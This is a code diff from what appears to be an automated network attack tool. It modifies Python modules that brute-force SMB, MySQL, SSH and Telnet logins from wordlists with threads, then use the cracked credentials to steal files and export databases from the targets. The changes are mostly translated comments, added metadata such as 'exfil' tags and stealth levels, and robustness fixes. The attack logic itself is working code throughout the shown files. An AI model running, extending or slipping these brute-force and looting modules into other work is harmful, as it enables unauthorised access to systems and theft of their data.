@@ -269,7 +277,7 @@ class SMBConnector:
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
@@ -339,7 +347,7 @@ class SMBConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# insère self.results dans creds (service='smb'), database = <share>
|
||||
# Insert results into creds (service='smb'), database = <share>
|
||||
for mac, ip, hostname, share, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
@@ -350,7 +358,7 @@ class SMBConnector:
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=share, # utilise la colonne 'database' pour distinguer les shares
|
||||
database=share, # uses the 'database' column to distinguish shares
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
@@ -364,12 +372,12 @@ class SMBConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
# plus nécessaire avec l'index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Mode autonome non utilisé en prod; on laisse simple
|
||||
# Standalone mode, not used in prod
|
||||
try:
|
||||
sd = SharedData()
|
||||
smb_bruteforce = SMBBruteforce(sd)
|
||||
|
||||
@@ -1,11 +1,4 @@
|
||||
"""
|
||||
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
|
||||
- Succès -> DB.creds (service='sql', database=<db>)
|
||||
- Conserve la logique (pymysql, queue/threads)
|
||||
"""
|
||||
"""sql_bruteforce.py - Threaded MySQL credential bruteforcer with database enumeration."""
|
||||
|
||||
import os
|
||||
import pymysql
|
||||
@@ -29,11 +22,24 @@ b_parent = None
|
||||
b_service = '["sql"]'
|
||||
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "sql", "mysql", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SQL Bruteforce"
|
||||
b_description = "Threaded MySQL credential bruteforcer with database enumeration."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SQLBruteforce.png"
|
||||
|
||||
class SQLBruteforce:
|
||||
"""Wrapper orchestrateur -> SQLConnector."""
|
||||
"""Orchestrator wrapper for SQLConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -41,11 +47,11 @@ class SQLBruteforce:
|
||||
logger.info("SQLConnector initialized.")
|
||||
|
||||
def bruteforce_sql(self, ip, port):
|
||||
"""Lance le bruteforce SQL pour (ip, port)."""
|
||||
"""Run SQL bruteforce for (ip, port)."""
|
||||
return self.sql_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
self.shared_data.bjorn_orch_status = "SQLBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
success, results = self.bruteforce_sql(ip, port)
|
||||
@@ -53,12 +59,12 @@ class SQLBruteforce:
|
||||
|
||||
|
||||
class SQLConnector:
|
||||
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles SQL (MySQL) attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +77,7 @@ class SQLConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -115,7 +121,7 @@ class SQLConnector:
|
||||
# ---------- SQL ----------
|
||||
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
|
||||
"""
|
||||
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
|
||||
Connect without DB then SHOW DATABASES. Returns (True, [dbs]) or (False, []).
|
||||
"""
|
||||
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
|
||||
try:
|
||||
@@ -188,7 +194,7 @@ class SQLConnector:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, port = self.queue.get()
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
|
||||
if success:
|
||||
@@ -213,6 +219,8 @@ class SQLConnector:
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
self.results = []
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
|
||||
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
|
||||
if total_tasks == 0:
|
||||
@@ -232,7 +240,7 @@ class SQLConnector:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return
|
||||
self.queue.put((adresse_ip, user, password, port))
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
threads = []
|
||||
thread_count = min(8, max(1, phase_tasks))
|
||||
@@ -261,7 +269,7 @@ class SQLConnector:
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
|
||||
# For each DB found, create/update a row in creds (service='sql', database=<dbname>)
|
||||
for ip, user, password, port, dbname in self.results:
|
||||
mac = self.mac_for_ip(ip)
|
||||
hostname = self.hostname_for_ip(ip) or ""
|
||||
@@ -288,7 +296,7 @@ class SQLConnector:
|
||||
self.results = []
|
||||
|
||||
def remove_duplicates(self):
|
||||
# inutile avec l’index unique; conservé pour compat.
|
||||
# No longer needed with unique index; kept for compat.
|
||||
pass
|
||||
|
||||
|
||||
|
||||
@@ -1,15 +1,4 @@
|
||||
"""
|
||||
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
|
||||
to find accessible accounts using various user credentials. It logs the results of
|
||||
successful connections.
|
||||
|
||||
SQL version (minimal changes):
|
||||
- Targets still provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
|
||||
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
|
||||
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
|
||||
"""
|
||||
"""ssh_bruteforce.py - Threaded SSH credential bruteforcer via paramiko."""
|
||||
|
||||
import os
|
||||
import paramiko
|
||||
@@ -24,7 +13,6 @@ from shared import SharedData
|
||||
from actions.bruteforce_common import ProgressTracker, merged_password_plan
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko internals
|
||||
@@ -32,7 +20,6 @@ for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hos
|
||||
"paramiko.kex", "paramiko.auth_handler"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
# Define the necessary global variables
|
||||
b_class = "SSHBruteforce"
|
||||
b_module = "ssh_bruteforce"
|
||||
b_status = "brute_force_ssh"
|
||||
@@ -40,9 +27,22 @@ b_port = 22
|
||||
b_service = '["ssh"]'
|
||||
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
|
||||
b_parent = None
|
||||
b_priority = 70 # tu peux ajuster la priorité si besoin
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "ssh", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "SSH Bruteforce"
|
||||
b_description = "Threaded SSH credential bruteforcer via paramiko with dictionary and exhaustive modes."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "SSHBruteforce.png"
|
||||
|
||||
|
||||
class SSHBruteforce:
|
||||
@@ -298,6 +298,19 @@ class SSHConnector:
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
# Drain queue if orchestrator exit is requested, to unblock join
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
# Discard remaining items so workers can finish
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
time.sleep(0.5)
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
@@ -1,13 +1,4 @@
|
||||
"""
|
||||
steal_data_sql.py — SQL data looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
|
||||
- DB.creds (service='sql') provides (user,password, database?).
|
||||
- We connect first without DB to enumerate tables (excluding system schemas),
|
||||
then connect per schema to export CSVs.
|
||||
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
|
||||
"""
|
||||
"""steal_data_sql.py - Exfiltrate MySQL databases as CSV after successful bruteforce."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -41,6 +32,12 @@ b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Data SQL"
|
||||
b_description = "Exfiltrate MySQL databases as CSV after successful credential bruteforce."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealDataSQL.png"
|
||||
|
||||
class StealDataSQL:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
@@ -169,6 +166,11 @@ class StealDataSQL:
|
||||
logger.info("Data steal interrupted.")
|
||||
return
|
||||
|
||||
# Validate identifiers to prevent SQL injection
|
||||
import re as _re
|
||||
if not _re.match(r'^[a-zA-Z0-9_]+$', schema) or not _re.match(r'^[a-zA-Z0-9_]+$', table):
|
||||
logger.warning(f"Skipping unsafe schema/table name: {schema}.{table}")
|
||||
return
|
||||
q = text(f"SELECT * FROM `{schema}`.`{table}`")
|
||||
with engine.connect() as conn:
|
||||
result = conn.execute(q)
|
||||
@@ -192,6 +194,8 @@ class StealDataSQL:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "databases": "0", "tables": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +254,6 @@ class StealDataSQL:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_ftp.py — FTP file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
|
||||
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
|
||||
- IP -> (MAC, hostname) via DB.hosts.
|
||||
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
|
||||
"""
|
||||
"""steal_files_ftp.py - Loot files from FTP servers using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -26,6 +18,24 @@ b_module = "steal_files_ftp"
|
||||
b_status = "steal_files_ftp"
|
||||
b_parent = "FTPBruteforce"
|
||||
b_port = 21
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_cred_found:ftp","on_service:ftp"]'
|
||||
b_requires = '{"all":[{"has_cred":"ftp"},{"has_port":21}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "ftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files FTP"
|
||||
b_description = "Loot files from FTP servers using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesFTP.png"
|
||||
|
||||
|
||||
class StealFilesFTP:
|
||||
@@ -108,7 +118,7 @@ class StealFilesFTP:
|
||||
return out
|
||||
|
||||
# -------- FTP helpers --------
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
# Max recursion depth for directory traversal (avoids symlink loops)
|
||||
_MAX_DEPTH = 5
|
||||
@@ -180,6 +190,8 @@ class StealFilesFTP:
|
||||
timer = None
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -268,5 +280,6 @@ class StealFilesFTP:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
if timer:
|
||||
timer.cancel()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_smb.py — SMB file looter (DB-backed).
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
|
||||
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
|
||||
- Also try anonymous (''/'').
|
||||
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
|
||||
"""
|
||||
"""steal_files_smb.py - Loot files from SMB shares using cracked or anonymous credentials."""
|
||||
|
||||
import os
|
||||
import logging
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_smb"
|
||||
b_status = "steal_files_smb"
|
||||
b_parent = "SMBBruteforce"
|
||||
b_port = 445
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["smb"]'
|
||||
b_trigger = 'on_any:["on_cred_found:smb","on_service:smb"]'
|
||||
b_requires = '{"all":[{"has_cred":"smb"},{"has_port":445}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "smb", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SMB"
|
||||
b_description = "Loot files from SMB shares using cracked or anonymous credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSMB.png"
|
||||
|
||||
|
||||
class StealFilesSMB:
|
||||
@@ -166,6 +176,8 @@ class StealFilesSMB:
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "share": "?", "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -250,3 +262,6 @@ class StealFilesSMB:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,23 +1,11 @@
|
||||
"""
|
||||
steal_files_ssh.py — SSH file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
|
||||
- SSH credentials are read from the DB table `creds` (service='ssh').
|
||||
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
|
||||
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
|
||||
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
|
||||
|
||||
Parent gate:
|
||||
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
|
||||
- This action runs once per eligible target (alive, open port, parent OK).
|
||||
"""
|
||||
"""steal_files_ssh.py - Loot files over SSH/SFTP using cracked credentials."""
|
||||
|
||||
import os
|
||||
import shlex
|
||||
import time
|
||||
import logging
|
||||
import paramiko
|
||||
from threading import Timer
|
||||
from threading import Timer, Lock
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
@@ -35,7 +23,7 @@ b_module = "steal_files_ssh" # Python module name (this file without
|
||||
b_status = "steal_files_ssh" # Human/readable status key (free form)
|
||||
|
||||
b_action = "normal" # 'normal' (per-host) or 'global'
|
||||
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
|
||||
b_service = '["ssh"]' # Services this action is about (JSON string for AST parser)
|
||||
b_port = 22 # Preferred target port (used if present on host)
|
||||
|
||||
# Trigger strategy:
|
||||
@@ -61,6 +49,13 @@ b_rate_limit = "3/86400" # at most 3 executions/day per host (ext
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
b_tags = ["exfil", "ssh", "sftp", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files SSH"
|
||||
b_description = "Loot files over SSH/SFTP using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesSSH.png"
|
||||
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "ssh", "loot"]
|
||||
@@ -71,6 +66,7 @@ class StealFilesSSH:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
|
||||
self.shared_data = shared_data
|
||||
self._state_lock = Lock() # protects sftp_connected / stop_execution
|
||||
self.sftp_connected = False # flipped to True on first SFTP open
|
||||
self.stop_execution = False # global kill switch (timer / orchestrator exit)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
@@ -194,8 +190,8 @@ class StealFilesSSH:
|
||||
- shared_data.steal_file_names (substring match)
|
||||
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
|
||||
"""
|
||||
# Quiet 'permission denied' messages via redirection
|
||||
cmd = f'find {dir_path} -type f 2>/dev/null'
|
||||
# Quiet 'permission denied' messages via redirection; escape dir_path to prevent injection
|
||||
cmd = f'find {shlex.quote(dir_path)} -type f 2>/dev/null'
|
||||
stdin, stdout, stderr = ssh.exec_command(cmd)
|
||||
files = (stdout.read().decode(errors="ignore") or "").splitlines()
|
||||
|
||||
@@ -203,7 +199,7 @@ class StealFilesSSH:
|
||||
names = set(self.shared_data.steal_file_names or [])
|
||||
if not exts and not names:
|
||||
# If no filters are defined, do nothing (too risky to pull everything).
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured - skipping.")
|
||||
return []
|
||||
|
||||
matches: List[str] = []
|
||||
@@ -218,7 +214,7 @@ class StealFilesSSH:
|
||||
logger.info(f"Found {len(matches)} matching files in {dir_path}")
|
||||
return matches
|
||||
|
||||
# Max file size to download (10 MB) — protects RPi Zero RAM
|
||||
# Max file size to download (10 MB) - protects RPi Zero RAM
|
||||
_MAX_FILE_SIZE = 10 * 1024 * 1024
|
||||
|
||||
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
|
||||
@@ -227,7 +223,8 @@ class StealFilesSSH:
|
||||
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
|
||||
"""
|
||||
sftp = ssh.open_sftp()
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
with self._state_lock:
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
|
||||
try:
|
||||
# Check file size before downloading
|
||||
@@ -235,7 +232,7 @@ class StealFilesSSH:
|
||||
st = sftp.stat(remote_file)
|
||||
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
|
||||
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
|
||||
return
|
||||
return # finally block still runs and closes sftp
|
||||
except Exception:
|
||||
pass # stat failed, try download anyway
|
||||
|
||||
@@ -245,6 +242,14 @@ class StealFilesSSH:
|
||||
os.makedirs(local_file_dir, exist_ok=True)
|
||||
|
||||
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
|
||||
|
||||
# Path traversal guard: ensure we stay within local_dir
|
||||
abs_local = os.path.realpath(local_file_path)
|
||||
abs_base = os.path.realpath(local_dir)
|
||||
if not abs_local.startswith(abs_base + os.sep) and abs_local != abs_base:
|
||||
logger.warning(f"Path traversal blocked: {remote_file} -> {abs_local}")
|
||||
return
|
||||
|
||||
sftp.get(remote_file, local_file_path)
|
||||
|
||||
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
|
||||
@@ -286,9 +291,10 @@ class StealFilesSSH:
|
||||
|
||||
# Define a timer: if we never establish SFTP in 4 minutes, abort
|
||||
def _timeout():
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
with self._state_lock:
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
@@ -1,12 +1,4 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
"""steal_files_telnet.py - Loot files over Telnet using cracked credentials."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -25,6 +17,24 @@ b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_cred_found:telnet","on_service:telnet"]'
|
||||
b_requires = '{"all":[{"has_cred":"telnet"},{"has_port":23}]}'
|
||||
b_priority = 60
|
||||
b_cooldown = 3600
|
||||
b_timeout = 600
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "high"
|
||||
b_max_retries = 1
|
||||
b_tags = ["exfil", "telnet", "loot", "files"]
|
||||
b_category = "exfiltration"
|
||||
b_name = "Steal Files Telnet"
|
||||
b_description = "Loot files over Telnet using cracked credentials."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "StealFilesTelnet.png"
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
@@ -110,7 +120,7 @@ class StealFilesTelnet:
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
# prompt detection (naïf mais identique à l'original)
|
||||
# Naive prompt detection (matches original behavior)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
@@ -159,7 +169,9 @@ class StealFilesTelnet:
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
self.shared_data.bjorn_orch_status = "StealFilesTelnet"
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"ip": ip, "port": str(port), "files": "0"}
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
@@ -216,3 +228,6 @@ class StealFilesTelnet:
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
"""
|
||||
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='telnet')
|
||||
- Conserve la logique d’origine (telnetlib, queue/threads)
|
||||
"""
|
||||
"""telnet_bruteforce.py - Threaded Telnet credential bruteforcer."""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
@@ -28,11 +22,24 @@ b_parent = None
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
b_cooldown = 1800 # 30 min between runs
|
||||
b_rate_limit = '3/86400' # max 3 per day
|
||||
b_enabled = 1
|
||||
b_action = "normal"
|
||||
b_timeout = 600
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 3
|
||||
b_risk_level = "medium"
|
||||
b_tags = ["bruteforce", "telnet", "credentials"]
|
||||
b_category = "exploitation"
|
||||
b_name = "Telnet Bruteforce"
|
||||
b_description = "Threaded Telnet credential bruteforcer with prompt detection."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "TelnetBruteforce.png"
|
||||
|
||||
class TelnetBruteforce:
|
||||
"""Wrapper orchestrateur -> TelnetConnector."""
|
||||
"""Orchestrator wrapper for TelnetConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
@@ -40,11 +47,11 @@ class TelnetBruteforce:
|
||||
logger.info("TelnetConnector initialized.")
|
||||
|
||||
def bruteforce_telnet(self, ip, port):
|
||||
"""Lance le bruteforce Telnet pour (ip, port)."""
|
||||
"""Run Telnet bruteforce for (ip, port)."""
|
||||
return self.telnet_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
"""Orchestrator entry point. Returns 'success' or 'failed'."""
|
||||
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
|
||||
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
|
||||
@@ -53,12 +60,12 @@ class TelnetBruteforce:
|
||||
|
||||
|
||||
class TelnetConnector:
|
||||
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
"""Handles Telnet attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +78,7 @@ class TelnetConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
